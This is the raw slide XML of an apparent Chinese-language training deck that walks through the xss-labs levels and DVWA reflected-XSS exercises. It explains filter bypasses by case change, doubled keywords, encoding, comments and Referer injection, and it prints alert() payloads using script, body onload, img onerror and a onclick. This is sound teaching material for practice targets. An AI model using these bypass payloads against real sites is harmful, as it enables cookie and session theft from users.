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9" r:id="rId4"/>
    <p:sldId id="290" r:id="rId5"/>
    <p:sldId id="291" r:id="rId6"/>
    <p:sldId id="292" r:id="rId7"/>
    <p:sldId id="281" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="282" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="284" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="288" r:id="rId22"/>
    <p:sldId id="260" r:id="rId23"/>
    <p:sldId id="270" r:id="rId24"/>
    <p:sldId id="295" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="298" r:id="rId27"/>
    <p:sldId id="299" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="297" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="304" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="30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F4F430E-61A6-4C9B-AB28-E09461FC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70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63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328115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35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730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80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33272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184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20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4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7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0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23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6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84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zh-CN" altLang="en-US"/>
              <a:t>单击图标添加图片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9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7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51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0dl3/xss-labs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515A3-7075-817E-BDDE-4CAC9FA0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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本攻击实验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DD8796C-14F5-4736-3D86-5675279A72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F870E53-35EE-8C22-148F-1C72D8E13B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9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Level2-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>闭合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可以看到，这次是传入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>keyword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数，但直接输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>没有反应，在源码中可以看到使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htmlspecial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数（该函数会把“和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实体化，但不会把‘实体化），但在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;input&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>元素中没有使用该函数，所以只需加上闭合就行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CFEA5D-1BB4-69AF-9AAB-6F37CC61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5" y="2662186"/>
            <a:ext cx="6187403" cy="20254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EC1BC5-9398-9F91-3FBB-AED2E81C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58" y="2843639"/>
            <a:ext cx="5581788" cy="18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Level3-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onfocus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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368" y="1034105"/>
            <a:ext cx="11429264" cy="1262782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从源码中可以看到这次都使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>htmlspecial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数进行过滤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FE1954-FBCC-4DFF-3999-A3C1C0B9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83" y="2109571"/>
            <a:ext cx="6308994" cy="13901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989B81-2F57-C073-71A2-2579CD59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825" y="3799114"/>
            <a:ext cx="5304510" cy="18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Level4-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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这次对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行了过滤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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后就会有弹窗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2765E7-3AF0-99F1-1833-14F5EC63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82" y="1897146"/>
            <a:ext cx="7329541" cy="1262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B29767-F42E-DC5A-B719-3A73B91B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51" y="4038588"/>
            <a:ext cx="8720201" cy="17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1E648-DFEF-570B-2B32-EE62CD1C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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常见的触发标签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E938F-8FC2-9543-1C68-2647EFE3B5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触发标签：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a&gt;,&lt;input&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>detals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;video&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;&lt;body&gt;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触发属性：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>onfocus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>onclick,onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>等等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47343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Level5-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用大小写绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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1322653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对常用的标签都进行了过滤，但没过滤大小写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2FD5F2-E7D2-3BB0-875C-EA8E8C8D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21" y="1695431"/>
            <a:ext cx="4626273" cy="21891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560618-1748-B21D-2815-1DDCEA96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64" y="3884625"/>
            <a:ext cx="5610249" cy="20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1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Level6-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用重复拼写绕过进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤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368" y="1034105"/>
            <a:ext cx="11429264" cy="1816252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接把关键字替换为空格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70F54F-00A2-9996-3469-EE7B5193A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15" y="1745005"/>
            <a:ext cx="5507860" cy="2013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8B0392-C9FE-C6B9-1CD6-773AB2F9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594" y="4060024"/>
            <a:ext cx="5300701" cy="16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Level7-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用编码绕过防御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EBD52B-C76B-5867-EA7C-4DB44ED9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72" y="1837985"/>
            <a:ext cx="7356756" cy="362052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BEC7F18-5D88-4C95-D3F6-F495B87A7B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381368" y="1034105"/>
            <a:ext cx="11429264" cy="1816252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="241927" indent="-241927" algn="l" defTabSz="967710" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1058"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3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这里把双引号也实体化了</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17530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Level7-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用编码绕过防御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BEC7F18-5D88-4C95-D3F6-F495B87A7B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381368" y="1034105"/>
            <a:ext cx="11429264" cy="1816252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="241927" indent="-241927" algn="l" defTabSz="967710" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1058"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2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可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动解码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码的特性插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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3C51DD-A553-C74F-B488-752A2CAF8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58" y="1472610"/>
            <a:ext cx="8169756" cy="20209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DA6EE9-3686-1726-0801-9292B374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026" y="3751812"/>
            <a:ext cx="5018003" cy="2048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A0B6C94-8C86-7207-AC19-225A0864F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49" y="3595145"/>
            <a:ext cx="4958126" cy="23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3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Level7-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用编码绕过防御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BEC7F18-5D88-4C95-D3F6-F495B87A7B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381368" y="1034105"/>
            <a:ext cx="11429264" cy="1816252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="241927" indent="-241927" algn="l" defTabSz="967710" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1058"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2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12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693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这里把空格实体化了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AE3459-3DF3-CF72-9478-4259312B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530" y="2294141"/>
            <a:ext cx="4286281" cy="32623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906556-E48F-D090-60FB-88911C7D7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97" y="2628031"/>
            <a:ext cx="7207733" cy="15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2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Level8-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用注释绕过防御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利用和上例相同的方法注入失败，查看源码发现输入的内容必须包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里使用注释绕过防御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946584-6768-13B2-3129-20CFA538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68" y="2616129"/>
            <a:ext cx="5718767" cy="20041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2C47ED-7406-92F0-E390-1F73C5E60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670"/>
            <a:ext cx="5848393" cy="18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0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DE1349-BDB6-0951-9DD7-DB4A39CC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XSS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B7321-B7F7-6285-0A9A-28F137DBD2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XSS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全称为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Cross Site Scripting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，为了和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分开简写为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XSS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，中文名为跨站脚本。该漏洞发生在用户端，是指在渲染过程中发生了不在预期过程中的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JavaScript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代码执行。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XSS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通常被用于获取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Cookie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、以受攻击者的身份进行操作等行为。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10012-C687-E977-C676-A5962A66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183" y="3577991"/>
            <a:ext cx="7081889" cy="17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Level9-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用隐式传参进行攻击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21F0FF-C4B7-E970-2963-15F01C498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20" y="2388858"/>
            <a:ext cx="7499609" cy="31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5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Level10-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Burpusite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>拦截数据包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Burpusite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>截获到的里加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Refer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性，内容为要注入的内容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6D877C-010C-33CC-1594-771C18B5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65" y="2112006"/>
            <a:ext cx="5569980" cy="23458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0EC3A4-9241-529B-22F7-3786E929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5" y="2251996"/>
            <a:ext cx="4898601" cy="20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9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4D324-4FBD-FD4E-1DF2-924C47DC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level10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F459DC-B40E-65A3-D247-A756BB041F3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82047" y="2865328"/>
            <a:ext cx="4922906" cy="313773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EDFA10-1E77-6AFE-5DCD-F5EC0705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28" y="2724487"/>
            <a:ext cx="5876068" cy="30118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D2E708-D5D4-EF10-7E99-7EB9C0B55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228" y="782290"/>
            <a:ext cx="5242800" cy="25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4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Level11-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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51B9BE-6F10-5E25-20B1-C1045EE3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39" y="2250034"/>
            <a:ext cx="4176304" cy="31403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B51D0D-BD36-01A9-4667-19A18BDE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356" y="1605872"/>
            <a:ext cx="2413470" cy="4025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960A05-FCE8-0A27-5CF5-0DE96BC9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292" y="1840377"/>
            <a:ext cx="4418946" cy="29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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的级别设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，查看源码可以看到没有对参数做任何防御处理措施，直接输出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AE576E-40E4-D100-47A9-154A8B14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1" y="1605283"/>
            <a:ext cx="61817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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可以看到使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数只对参数进行了简单的替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>别的没有过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时可以用大小写或者别的标签来绕过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D73763-133A-DA67-7D6C-286CDD1A3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48" y="2185648"/>
            <a:ext cx="5905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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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大小写绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;Script&gt;alert('xxx')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>组合过滤条件绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>尝试使用别的标签来绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;body onload=alert('s')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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='' onclick=alert('ss')&gt;click&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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='' onclick=alert(/ss/)&gt;click&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>#&lt;script&gt;alert('xx')&lt;/script&gt;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7898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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可以看到使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正则表达式函数，对参数进行过滤，查看源码可以看到对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标签进行了严格的过滤，但没有过滤别的标签，此时可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等标签的事件或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等标签的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入恶意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码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267CD5-41C4-D0F8-8BA6-B9A08424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59" y="2751858"/>
            <a:ext cx="7524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1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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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尝试使用别的标签来绕过</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;body onload=alert('s')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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="" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>')&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='' onclick=alert('ss')&gt;click&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>='' onclick=alert(/ss/)&gt;click&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6675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Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>窃取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设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
